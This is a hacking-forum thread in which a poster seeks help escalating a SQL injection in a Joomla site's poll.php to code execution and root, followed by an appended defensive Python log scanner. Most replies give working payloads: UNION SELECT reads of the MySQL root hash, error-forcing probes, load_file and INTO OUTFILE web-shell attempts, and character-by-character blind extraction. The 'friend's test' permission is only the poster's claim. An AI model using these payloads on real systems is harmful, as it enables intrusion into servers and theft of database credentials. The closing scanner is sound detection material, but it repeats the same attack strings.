FestarBG

RCE through SQL Injection?

5 posts in this topic

Hi,

a friend of mine gave me a kind of security test - he wants me to hack his box through a vulnerable web page. I win if I am able to make a folder in a writable directory called "skiddie" and eventually gain root privileges and make a folder in another directory. I found that the site is vulnerable to a SQL injection:

hxxp://*****.com/poll.php?id=1 union select null,null,"test",null--

And the website returns the word "test". Instead of "test" I tried:

database() - joomla

user() - root@localhost

@@datadir - /var/lib/mysql/

@@version - 5.0.75-1

I was also able to extract the admin username and password, but I can't crack the hash. The first thing that came to my mind was to use null,"php code" into outfile "/var/www/", but it doesn't work. It seems I don't have privileges to write in "/var/www", and I also do not know the directory where the website is - "/var/www/DIR?". Can you give me a hint how to proceed?

Thanks.

:)

Edited by FestarBG

Well you may just want to try making it have an error.

Usually if verbose errors are enabled it will freak out and give you the full path

For example:

hxxp://anysiterunningw0rdpr3s$.com/wp-settings.php

Dig around for an includes directory or something. You can almost always get it to fork an error of some sort.

EDIT: Seeing as you're root, you may want to check out the mysql.user and the INFORMATION_SCHEMA tables:

Since you're using the particular versions that you are:

http://dev.mysql.com/doc/refman/5.0/en/inf...ion-schema.html

might even try :

hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE host='localhost' AND user='root'),null--

hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE user='root' LIMIT 1),null--

(SELECT Password FROM mysql.user WHERE host='localhost' AND user='root')

OR

(SELECT Password FROM mysql.user WHERE user='root' LIMIT 1)

May return a SQL 5.0 password hash, since you are running as root, after all.

Edited by RETN

OK, I'll search for some verbose errors.

Neither of the queries works. I tried

poll.php?id=1+union+select+null,password,null,null+from+mysql.user+where+user="root"+limit+0,1--

Works, but the hash isn't extracted.

Any other ideas.. :huh:


Try

poll.php?id[]=1

for kicking errors.

MySQL might not be world-facing, and it wouldn't be that uncommon if it doesn't even have a pw.

Try using load_file to locate the apache httpd.conf, find the document root, then try outfile again.

A few Apache conf locations to try


You may want to try some boolean enumeration. See if the following works:

hxxp://*****.com/poll.php?id=1%20AND%201=1

hxxp://*****.com/poll.php?id=1%20AND%201=0

The first should return whatever is usually there, and I'm guessing that the second should make no "poll" display. If you get this far, you have a working true and false.

If this is the case, then,

hxxp://*****.com/poll.php?id=1%20AND%20((ASCII((MID((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1),1,1))))>96)

Will tell you if the ASCII code of the first character of the password is greater than 96 (lowercase a or above). If this works, you'll want to break out an ASCII chart to cross compare. You should be able to modify the above query to properly isolate the correct values. I am not 100% sure about MySQL 5.0, but I believe the hash to be stored in hexadecimal, meaning your possible ASCII codes will be 97-102 (a-f) and 48-57 (0-9). You may also want to find the length of the hash with the following comparison:

hxxp://*****.com/poll.php?id=1%20AND%20((LENGTH((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1)))>10)

This will "return true" if the length of the hash is greater than ten.

Happy hacking. Hope this helped.

EDIT: SQL Syntax

EDIT: One more thing -- you may want to check out the grants table. This will tell you if it's A) world accessible or B) you have the privileges you want. Just a thought.

Edited by RETN
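From the defending side, every technique traded in this thread (UNION SELECT, INTO OUTFILE / load_file, reads of mysql.user, `AND 1=1` boolean probes, character-by-character ASCII/MID/LENGTH comparisons, and the `id[]=1` array trick for forcing errors) leaves a recognisable trace in the web server's access log. The following is an added example, not code from anyone in the thread: a small Python scanner that flags those patterns in Apache combined-format log lines. The log lines, IP addresses and timestamps are constructed; the poll.php requests reuse the thread's own payloads.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the injection techniques discussed in the thread, applied to
# the URL-decoded request path. Heuristic: tune to the application before use.
SIGNATURES = {
    "union_select":   re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
    "file_io":        re.compile(r"\binto\s+(?:out|dump)file\b|\bload_file\s*\(", re.I),
    "mysql_user":     re.compile(r"\bmysql\.user\b", re.I),
    "boolean_probe":  re.compile(r"\band\s+\d+\s*=\s*\d+\b", re.I),
    "blind_charwise": re.compile(r"\b(?:ascii|mid|substring|length)\s*\(", re.I),
    "array_param":    re.compile(r"\?[^=&]*\[\]="),   # id[]=1 turns the parameter into a PHP array
    "comment_tail":   re.compile(r"--\s*$"),          # trailing SQL comment used to swallow the rest of the query
}

# Apache combined-format request line (only the fields we need).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log (addresses from the documentation ranges, not real hosts).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2009:13:55:36 +0000] "GET /poll.php?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2009:13:55:41 +0000] "GET /poll.php?id=1%20union%20select%20null,null,%22test%22,null-- HTTP/1.1" 200 498
203.0.113.5 - - [10/Oct/2009:13:56:02 +0000] "GET /poll.php?id%5B%5D=1 HTTP/1.1" 500 231
203.0.113.5 - - [10/Oct/2009:13:57:10 +0000] "GET /poll.php?id=1%20AND%20((ASCII((MID((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1),1,1))))>96) HTTP/1.1" 200 512
198.51.100.7 - - [10/Oct/2009:14:01:00 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8123
"""

def classify_request(path):
    """Return the signature names matching a request path. The path is decoded
    twice because some probes arrive double-encoded (%2520 -> %20 -> space)."""
    decoded = unquote_plus(unquote_plus(path))
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines):
    """Yield (ip, status, path, hits) for every request matching a signature."""
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = classify_request(m.group("path"))
        if hits:
            yield m.group("ip"), m.group("status"), m.group("path"), hits

if __name__ == "__main__":
    for ip, status, path, hits in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {status} {','.join(hits)} {path}")
```

A 500 on a request flagged `array_param` is the error-forcing probe the thread recommends, so status code plus signature together is a stronger alert than either alone.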
